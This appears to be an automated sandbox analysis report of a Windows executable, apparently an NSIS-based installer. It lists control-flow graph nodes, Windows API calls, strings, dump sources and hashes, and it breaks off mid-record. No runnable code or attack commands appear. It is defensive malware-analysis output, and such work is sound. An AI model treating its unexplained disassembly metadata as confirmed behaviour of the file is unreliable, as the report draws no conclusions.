                                                  control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 443 40603d-406041 437->443 446 406056-40605d 438->446 444 406150-40615c call 405e8f 439->444 445 40615e-40616b call 405f48 439->445 441 406190-4061a1 lstrlenW 440->441 442 406183-40618b call 405f6a 440->442 441->423 442->441 443->438 448 406043-406047 443->448 457 406170-406179 444->457 445->457 450 406062-406064 446->450 451 40605f-406061 446->451 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-406083 call 405e15 450->456 451->450 453->446 460 4060b3-4060b6 455->460 461 4060a5-4060b1 GetSystemDirectoryW 455->461 462 406088-40608c 456->462 457->441 459 40617b 457->459 463 40613c-406142 call 4061dc 459->463 465 406121-406123 460->465 466 4060b8-4060c6 GetWindowsDirectoryW 460->466 464 406125-406129 461->464 467 406092-40609b call 405f6a 462->467 468 40612b-40612f 462->468 463->441 464->463 464->468 465->464 469 4060c8-4060d2 465->469 466->465 467->464 468->463 472 406131-406137 lstrcatW 468->472 474 4060d4-4060d7 469->474 475 4060ec-406102 SHGetSpecialFolderLocation 469->475 472->463 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->464 478->479 479->465 480->464 480->475
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                  • CoTaskMemFree.OLE32(?), ref: 00406113
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-3452187874
                                                  • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                  • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                  • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                  • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 486 40598c-405990 484->486 487 405818-40581a 485->487 488 405829-405839 call 405f48 485->488 489 405820-405823 487->489 490 40593a-40593f 487->490 494 405848-405849 call 4059df 488->494 495 40583b-405846 lstrcatW 488->495 489->488 489->490 490->486 493 405941-405944 490->493 496 405946-40594c 493->496 497 40594e-405956 call 40628b 493->497 498 40584e-405852 494->498 495->498 496->486 497->486 505 405958-40596c call 405993 call 405788 497->505 501 405854-40585c 498->501 502 40585e-405864 lstrcatW 498->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 507 40588b-405893 504->507 508 40592f-405933 504->508 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 511 4058b3-4058c7 call 405f48 507->511 512 405895-40589d 507->512 508->490 510 405935 508->510 510->490 523 4058c9-4058d1 511->523 524 4058de-4058e9 call 405788 511->524 513 405912-405922 FindNextFileW 512->513 514 40589f-4058a7 512->514 513->507 520 405928-405929 FindClose 513->520 514->511 517 4058a9-4058b1 514->517 517->511 517->513 520->508 521->486 522->496 525 405973-405982 call 4051f2 call 405de2 522->525 523->513 526 4058d3-4058dc call 4057d0 523->526 534 40590a-40590d call 4051f2 524->534 535 4058eb-4058ee 524->535 525->486 526->513 534->513 538 4058f0-405900 call 4051f2 call 405de2 535->538 539 405902-405908 535->539 538->513 539->513
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 004057F9
                                                  • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 00405841
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 00405864
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 0040586A
                                                  • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 0040587A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                  • FindClose.KERNEL32(00000000), ref: 00405929
                                                  Strings
                                                  • "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe", xrefs: 004057D9
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057DE
                                                  • \*.*, xrefs: 0040583B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-506693701
                                                  • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                  • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                  • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                  • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 556 401798-401799 call 4061dc 550->556 551->556 560 40179e-4017a2 556->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 607 401847-401848 575->607 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 594 4029d2-4029d6 589->594 592 4018c4-4018c7 591->592 593 4029c7-4029ca 591->593 596 4018c9-4018da call 405f6a lstrcatW 592->596 597 4018dc-4018df call 405f6a 592->597 593->589 603 4018e4-402243 call 405724 596->603 597->603 603->594 607->585 609 40184a-40184b 607->609 609->574
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231,?,?,00000031), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp$C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231$Call
                                                  • API String ID: 1941528284-1573357854
                                                  • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                  • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                  • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                  • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                  • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                  • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                  • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406296
                                                  • FindClose.KERNEL32(00000000), ref: 004062A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: 8WB
                                                  • API String ID: 2295610775-3088156181
                                                  • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                  • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                  • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                  • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID:
                                                  • API String ID: 310444273-0
                                                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                  • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                  APIs
                                                  • CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231, xrefs: 004020FB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231
                                                  • API String ID: 542301482-1862805445
                                                  • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                  • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                  • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                  • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                  • ShowWindow.USER32(?), ref: 00403D1B
                                                  • DestroyWindow.USER32 ref: 00403D2F
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                  • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                  • GetDlgItem.USER32(?,?), ref: 00403E35
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                  • EnableWindow.USER32(?,?), ref: 00403F9E
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                  • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                  • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: &B
                                                  • API String ID: 3282139019-3208460036
                                                  • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
